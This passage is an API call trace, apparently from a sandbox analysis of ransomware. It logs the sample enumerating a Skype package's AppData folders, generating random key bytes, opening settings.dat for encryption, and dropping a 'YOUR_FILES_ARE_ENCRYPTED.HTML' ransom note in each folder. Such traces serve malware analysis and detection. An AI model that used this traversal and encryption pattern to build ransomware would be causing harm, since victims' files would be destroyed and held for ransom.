out: param_1="F0") returned 2 [0118.077] wsprintfW (in: param_1=0x19ddda, param_2="%02X" | out: param_1="3B") returned 2 [0118.077] wsprintfW (in: param_1=0x19ddde, param_2="%02X" | out: param_1="22") returned 2 [0118.077] wsprintfW (in: param_1=0x19dde2, param_2="%02X" | out: param_1="26") returned 2 [0118.077] wsprintfW (in: param_1=0x19dde6, param_2="%02X" | out: param_1="BC") returned 2 [0118.077] wsprintfW (in: param_1=0x19ddea, param_2="%02X" | out: param_1="25") returned 2 [0118.077] wsprintfW (in: param_1=0x19ddee, param_2="%02X" | out: param_1="6A") returned 2 [0118.077] wsprintfW (in: param_1=0x19ddf2, param_2="%02X" | out: param_1="37") returned 2 [0118.077] wsprintfW (in: param_1=0x19ddf6, param_2="%02X" | out: param_1="E2") returned 2 [0118.077] wsprintfW (in: param_1=0x19ddfa, param_2="%02X" | out: param_1="A7") returned 2 [0118.077] wsprintfW (in: param_1=0x19ddfe, param_2="%02X" | out: param_1="1F") returned 2 [0118.077] wsprintfW (in: param_1=0x19de02, param_2="%02X" | out: param_1="22") returned 2 [0118.077] wsprintfW (in: param_1=0x19de06, param_2="%02X" | out: param_1="7B") returned 2 [0118.077] wsprintfW (in: param_1=0x19de0a, param_2="%02X" | out: param_1="19") returned 2 [0118.077] wsprintfW (in: param_1=0x19de0e, param_2="%02X" | out: param_1="39") returned 2 [0118.077] wsprintfW (in: param_1=0x19de12, param_2="%02X" | out: param_1="34") returned 2 [0118.078] lstrcpyW (in: lpString1=0x6803f4, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.SkypeApp_kzf8qxf38zg5c\\Microsoft.SkypeApp_3.2.1.0_x86__kzf8qxf38zg5c\\ActivationStore\\ActivationStore.dat" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.SkypeApp_kzf8qxf38zg5c\\Microsoft.SkypeApp_3.2.1.0_x86__kzf8qxf38zg5c\\ActivationStore\\ActivationStore.dat") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.SkypeApp_kzf8qxf38zg5c\\Microsoft.SkypeApp_3.2.1.0_x86__kzf8qxf38zg5c\\ActivationStore\\ActivationStore.dat" [0118.078] CreateIoCompletionPort (FileHandle=0x32c, ExistingCompletionPort=0x274, CompletionKey=0x670340, NumberOfConcurrentThreads=0x0) returned 0x274 [0118.078] PostQueuedCompletionStatus (CompletionPort=0x274, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x670340, lpOverlapped=0x670340) returned 1 [0118.078] FindNextFileW (in: hFindFile=0x6266f8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0xf8852921, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0xf8852921, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0xf8852921, ftLastWriteTime.dwHighDateTime=0x1d70070, nFileSizeHigh=0x0, nFileSizeLow=0x2000, dwReserved0=0x311bec0, dwReserved1=0x631190, cFileName="ActivationStore.dat.LOG1", cAlternateFileName="ACTIVA~1.LOG")) returned 1 [0118.078] StrStrIW (lpFirst="ActivationStore.dat.LOG1", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0118.078] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.SkypeApp_kzf8qxf38zg5c\\Microsoft.SkypeApp_3.2.1.0_x86__kzf8qxf38zg5c\\ActivationStore\\ActivationStore.dat.LOG1") returned 168 [0118.078] PathFindExtensionW (pszPath="ActivationStore.dat.LOG1") returned=".LOG1" [0118.078] lstrlenW (lpString=".LOG1") returned 5 [0118.078] PathFindExtensionW (pszPath="ActivationStore.dat.LOG1") returned=".LOG1" [0118.078] FindNextFileW (in: hFindFile=0x6266f8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0xf8852921, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0xf8852921, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0xf8852921, ftLastWriteTime.dwHighDateTime=0x1d70070, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x311bec0, dwReserved1=0x631190, cFileName="ActivationStore.dat.LOG2", cAlternateFileName="ACTIVA~2.LOG")) returned 1 [0118.078] StrStrIW (lpFirst="ActivationStore.dat.LOG2", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0118.078] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.SkypeApp_kzf8qxf38zg5c\\Microsoft.SkypeApp_3.2.1.0_x86__kzf8qxf38zg5c\\ActivationStore\\ActivationStore.dat.LOG2") returned 168 [0118.078] PathFindExtensionW (pszPath="ActivationStore.dat.LOG2") returned=".LOG2" [0118.078] lstrlenW (lpString=".LOG2") returned 5 [0118.078] PathFindExtensionW (pszPath="ActivationStore.dat.LOG2") returned=".LOG2" [0118.078] FindNextFileW (in: hFindFile=0x6266f8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0xf8852921, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0xf8852921, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0xf8852921, ftLastWriteTime.dwHighDateTime=0x1d70070, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x311bec0, dwReserved1=0x631190, cFileName="ActivationStore.dat.LOG2", cAlternateFileName="ACTIVA~2.LOG")) returned 0 [0118.078] FindClose (in: hFindFile=0x6266f8 | out: hFindFile=0x6266f8) returned 1 [0118.078] wnsprintfW (in: pszDest=0x314b010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.SkypeApp_kzf8qxf38zg5c\\Microsoft.SkypeApp_3.2.1.0_x86__kzf8qxf38zg5c\\ActivationStore\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 173 [0118.078] GetProcessHeap () returned 0x600000 [0118.078] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6d77d0 [0118.080] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.SkypeApp_kzf8qxf38zg5c\\Microsoft.SkypeApp_3.2.1.0_x86__kzf8qxf38zg5c\\ActivationStore\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.skypeapp_kzf8qxf38zg5c\\microsoft.skypeapp_3.2.1.0_x86__kzf8qxf38zg5c\\activationstore\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x214 [0118.081] WriteFile (in: hFile=0x214, lpBuffer=0x6d77d0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e17c, lpOverlapped=0x0 | out: lpBuffer=0x6d77d0*, lpNumberOfBytesWritten=0x19e17c*=0x3c00, lpOverlapped=0x0) returned 1 [0118.083] CloseHandle (hObject=0x214) returned 1 [0118.083] GetProcessHeap () returned 0x600000 [0118.083] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6d77d0 | out: hHeap=0x600000) returned 1 [0118.083] GetProcessHeap () returned 0x600000 [0118.083] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x314b010 | out: hHeap=0x600000) returned 1 [0118.083] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf87ba052, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0xf87ba052, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0xf8852921, ftLastWriteTime.dwHighDateTime=0x1d70070, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63122c, dwReserved1=0x631188, cFileName="ActivationStore", cAlternateFileName="ACTIVA~1")) returned 0 [0118.083] FindClose (in: hFindFile=0x626638 | out: hFindFile=0x626638) returned 1 [0118.083] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.SkypeApp_kzf8qxf38zg5c\\Microsoft.SkypeApp_3.2.1.0_x86__kzf8qxf38zg5c\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 157 [0118.083] GetProcessHeap () returned 0x600000 [0118.083] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6d77d0 [0118.083] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.SkypeApp_kzf8qxf38zg5c\\Microsoft.SkypeApp_3.2.1.0_x86__kzf8qxf38zg5c\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.skypeapp_kzf8qxf38zg5c\\microsoft.skypeapp_3.2.1.0_x86__kzf8qxf38zg5c\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x324 [0118.084] WriteFile (in: hFile=0x324, lpBuffer=0x6d77d0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e490, lpOverlapped=0x0 | out: lpBuffer=0x6d77d0*, lpNumberOfBytesWritten=0x19e490*=0x3c00, lpOverlapped=0x0) returned 1 [0118.085] CloseHandle (hObject=0x324) returned 1 [0118.085] GetProcessHeap () returned 0x600000 [0118.085] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6d77d0 | out: hHeap=0x600000) returned 1 [0118.085] GetProcessHeap () returned 0x600000 [0118.085] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x313b008 | out: hHeap=0x600000) returned 1 [0118.086] FindNextFileW (in: hFindFile=0x626978, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf825cc02, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0xf825cc02, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0xf825cc02, ftLastWriteTime.dwHighDateTime=0x1d70070, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6363f0, dwReserved1=0xffffffff, cFileName="RoamingState", cAlternateFileName="ROAMIN~1")) returned 1 [0118.086] StrStrIW (lpFirst="RoamingState", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0118.086] wnsprintfW (in: pszDest=0x698498, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.SkypeApp_kzf8qxf38zg5c\\RoamingState") returned 94 [0118.086] GetProcessHeap () returned 0x600000 [0118.087] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x313b008 [0118.088] lstrcpyW (in: lpString1=0x313b008, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.SkypeApp_kzf8qxf38zg5c\\RoamingState" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.SkypeApp_kzf8qxf38zg5c\\RoamingState") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.SkypeApp_kzf8qxf38zg5c\\RoamingState" [0118.088] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.SkypeApp_kzf8qxf38zg5c\\RoamingState", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.SkypeApp_kzf8qxf38zg5c\\RoamingState\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.SkypeApp_kzf8qxf38zg5c\\RoamingState\\*" [0118.088] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.SkypeApp_kzf8qxf38zg5c\\RoamingState\\*", lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf825cc02, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0xf825cc02, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0xf825cc02, ftLastWriteTime.dwHighDateTime=0x1d70070, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63122c, dwReserved1=0x631188, cFileName=".", cAlternateFileName="")) returned 0x626a38 [0118.088] FindNextFileW (in: hFindFile=0x626a38, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf825cc02, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0xf825cc02, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0xf825cc02, ftLastWriteTime.dwHighDateTime=0x1d70070, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63122c, dwReserved1=0x631188, cFileName="..", cAlternateFileName="")) returned 1 [0118.088] FindNextFileW (in: hFindFile=0x626a38, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf825cc02, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0xf825cc02, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0xf825cc02, ftLastWriteTime.dwHighDateTime=0x1d70070, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63122c, dwReserved1=0x631188, cFileName="..", cAlternateFileName="")) returned 0 [0118.088] FindClose (in: hFindFile=0x626a38 | out: hFindFile=0x626a38) returned 1 [0118.088] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.SkypeApp_kzf8qxf38zg5c\\RoamingState\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 124 [0118.088] GetProcessHeap () returned 0x600000 [0118.088] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6d77d0 [0118.089] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.SkypeApp_kzf8qxf38zg5c\\RoamingState\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.skypeapp_kzf8qxf38zg5c\\roamingstate\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x324 [0118.090] WriteFile (in: hFile=0x324, lpBuffer=0x6d77d0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e490, lpOverlapped=0x0 | out: lpBuffer=0x6d77d0*, lpNumberOfBytesWritten=0x19e490*=0x3c00, lpOverlapped=0x0) returned 1 [0118.091] CloseHandle (hObject=0x324) returned 1 [0118.091] GetProcessHeap () returned 0x600000 [0118.091] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6d77d0 | out: hHeap=0x600000) returned 1 [0118.091] GetProcessHeap () returned 0x600000 [0118.091] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x313b008 | out: hHeap=0x600000) returned 1 [0118.091] FindNextFileW (in: hFindFile=0x626978, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf825cc02, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0xf8282d8b, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0xf831b7dc, ftLastWriteTime.dwHighDateTime=0x1d70070, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6363f0, dwReserved1=0xffffffff, cFileName="Settings", cAlternateFileName="")) returned 1 [0118.091] StrStrIW (lpFirst="Settings", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0118.091] wnsprintfW (in: pszDest=0x698498, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.SkypeApp_kzf8qxf38zg5c\\Settings") returned 90 [0118.091] GetProcessHeap () returned 0x600000 [0118.091] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x313b008 [0118.091] lstrcpyW (in: lpString1=0x313b008, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.SkypeApp_kzf8qxf38zg5c\\Settings" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.SkypeApp_kzf8qxf38zg5c\\Settings") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.SkypeApp_kzf8qxf38zg5c\\Settings" [0118.091] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.SkypeApp_kzf8qxf38zg5c\\Settings", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.SkypeApp_kzf8qxf38zg5c\\Settings\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.SkypeApp_kzf8qxf38zg5c\\Settings\\*" [0118.091] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.SkypeApp_kzf8qxf38zg5c\\Settings\\*", lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf825cc02, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0xf8282d8b, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0xf831b7dc, ftLastWriteTime.dwHighDateTime=0x1d70070, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63122c, dwReserved1=0x631188, cFileName=".", cAlternateFileName="")) returned 0x6265b8 [0118.092] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf825cc02, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0xf8282d8b, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0xf831b7dc, ftLastWriteTime.dwHighDateTime=0x1d70070, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63122c, dwReserved1=0x631188, cFileName="..", cAlternateFileName="")) returned 1 [0118.092] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf831b7dc, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0xf831b7dc, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0xf831b7dc, ftLastWriteTime.dwHighDateTime=0x1d70070, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x63122c, dwReserved1=0x631188, cFileName="roaming.lock", cAlternateFileName="ROAMIN~1.LOC")) returned 1 [0118.092] StrStrIW (lpFirst="roaming.lock", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0118.092] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.SkypeApp_kzf8qxf38zg5c\\Settings\\roaming.lock") returned 103 [0118.092] PathFindExtensionW (pszPath="roaming.lock") returned=".lock" [0118.092] lstrlenW (lpString=".lock") returned 5 [0118.092] PathFindExtensionW (pszPath="roaming.lock") returned=".lock" [0118.092] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf8282d8b, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0xf8282d8b, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0x11d3fb2a, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x2000, dwReserved0=0x63122c, dwReserved1=0x631188, cFileName="settings.dat", cAlternateFileName="")) returned 1 [0118.092] StrStrIW (lpFirst="settings.dat", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0118.092] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.SkypeApp_kzf8qxf38zg5c\\Settings\\settings.dat") returned 103 [0118.092] PathFindExtensionW (pszPath="settings.dat") returned=".dat" [0118.092] lstrlenW (lpString=".dat") returned 4 [0118.092] PathFindExtensionW (pszPath="settings.dat") returned=".dat" [0118.092] SystemFunction036 (in: RandomBuffer=0x19e16c, RandomBufferLength=0x20 | out: RandomBuffer=0x19e16c) returned 1 [0118.092] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.SkypeApp_kzf8qxf38zg5c\\Settings\\settings.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.skypeapp_kzf8qxf38zg5c\\settings\\settings.dat"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x214 [0118.093] GetFileSizeEx (in: hFile=0x214, lpFileSize=0x19e190 | out: lpFileSize=0x19e190*=8192) returned 1 [0118.093] GetProcessHeap () returned 0x600000 [0118.093] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x28150) returned 0x30f2fc0 [0118.096] wsprintfW (in: param_1=0x19e0aa, param_2="%02X" | out: param_1="A4") returned 2 [0118.096] wsprintfW (in: param_1=0x19e0ae, param_2="%02X" | out: param_1="69") returned 2 [0118.096] wsprintfW (in: param_1=0x19e0b2, param_2="%02X" | out: param_1="9D") returned 2 [0118.096] wsprintfW (in: param_1=0x19e0b6, param_2="%02X" | out: param_1="CF") returned 2 [0118.096] wsprintfW (in: param_1=0x19e0ba, param_2="%02X" | out: param_1="A4") returned 2 [0118.096] wsprintfW (in: param_1=0x19e0be, param_2="%02X" | out: param_1="FF") returned 2 [0118.096] wsprintfW (in: param_1=0x19e0c2, param_2="%02X" | out: param_1="DF") returned 2 [0118.096] wsprintfW (in: param_1=0x19e0c6, param_2="%02X" | out: param_1="99") returned 2 [0118.096] wsprintfW (in: param_1=0x19e0ca, param_2="%02X" | out: param_1="E9") returned 2 [0118.096] wsprintfW (in: param_1=0x19e0ce, param_2="%02X" | out: param_1="00") returned 2 [0118.096] wsprintfW (in: param_1=0x19e0d2, param_2="%02X" | out: param_1="6B") returned 2 [0118.096] wsprintfW (in: param_1=0x19e0d6, param_2="%02X" | out: param_1="93") returned 2 [0118.096] wsprintfW (in: param_1=0x19e0da, param_2="%02X" | out: param_1="CA") returned 2 [0118.096] wsprintfW (in: param_1=0x19e0de, param_2="%02X" | out: param_1="CC") returned 2 [0118.096] wsprintfW (in: param_1=0x19e0e2, param_2="%02X" | out: param_1="88") returned 2 [0118.096] wsprintfW (in: param_1=0x19e0e6, param_2="%02X" | out: param_1="AB") returned 2 [0118.096] wsprintfW (in: param_1=0x19e0ea, param_2="%02X" | out: param_1="AA") returned 2 [0118.096] wsprintfW (in: param_1=0x19e0ee, param_2="%02X" | out: param_1="E6") returned 2 [0118.097] wsprintfW (in: param_1=0x19e0f2, param_2="%02X" | out: param_1="68") returned 2 [0118.097] wsprintfW (in: param_1=0x19e0f6, param_2="%02X" | out: param_1="B4") returned 2 [0118.097] wsprintfW (in: param_1=0x19e0fa, param_2="%02X" | out: param_1="63") returned 2 [0118.097] wsprintfW (in: param_1=0x19e0fe, param_2="%02X" | out: param_1="8E") returned 2 [0118.097] wsprintfW (in: param_1=0x19e102, param_2="%02X" | out: param_1="0F") returned 2 [0118.097] wsprintfW (in: param_1=0x19e106, param_2="%02X" | out: param_1="DC") returned 2 [0118.097] wsprintfW (in: param_1=0x19e10a, param_2="%02X" | out: param_1="32") returned 2 [0118.097] wsprintfW (in: param_1=0x19e10e, param_2="%02X" | out: param_1="91") returned 2 [0118.097] wsprintfW (in: param_1=0x19e112, param_2="%02X" | out: param_1="1B") returned 2 [0118.097] wsprintfW (in: param_1=0x19e116, param_2="%02X" | out: param_1="A8") returned 2 [0118.097] wsprintfW (in: param_1=0x19e11a, param_2="%02X" | out: param_1="16") returned 2 [0118.097] wsprintfW (in: param_1=0x19e11e, param_2="%02X" | out: param_1="BF") returned 2 [0118.097] wsprintfW (in: param_1=0x19e122, param_2="%02X" | out: param_1="CD") returned 2 [0118.097] wsprintfW (in: param_1=0x19e126, param_2="%02X" | out: param_1="44") returned 2 [0118.098] lstrcpyW (in: lpString1=0x3103074, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.SkypeApp_kzf8qxf38zg5c\\Settings\\settings.dat" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.SkypeApp_kzf8qxf38zg5c\\Settings\\settings.dat") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.SkypeApp_kzf8qxf38zg5c\\Settings\\settings.dat" [0118.098] CreateIoCompletionPort (FileHandle=0x214, ExistingCompletionPort=0x274, CompletionKey=0x30f2fc0, NumberOfConcurrentThreads=0x0) returned 0x274 [0118.098] PostQueuedCompletionStatus (CompletionPort=0x274, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x30f2fc0, lpOverlapped=0x30f2fc0) returned 1 [0118.098] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf8282d8b, ftCreationTime.dwHighDateTime=0x1d70070, ftLastAccessTime.dwLowDateTime=0xf8282d8b, ftLastAccessTime.dwHighDateTime=0x1d70070, ftLastWriteTime.dwLowDateTime=0x11d3fb2a, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x2000, dwReserved0=0x63122c, dwReserved1=0x631188, cFileName="settings.dat", cAlternateFileName="")) returned 0 [0118.098] FindClose (in: hFindFile=0x6265b8 | out: hFindFile=0x6265b8) returned 1 [0118.098] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.SkypeApp_kzf8qxf38zg5c\\Settings\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 120 [0118.098] GetProcessHeap () returned 0x600000 [0118.098] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6d77d0 [0118.099] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.SkypeApp_kzf8qxf38zg5c\\Settings\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.skypeapp_kzf8qxf38zg5c\\settings\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, 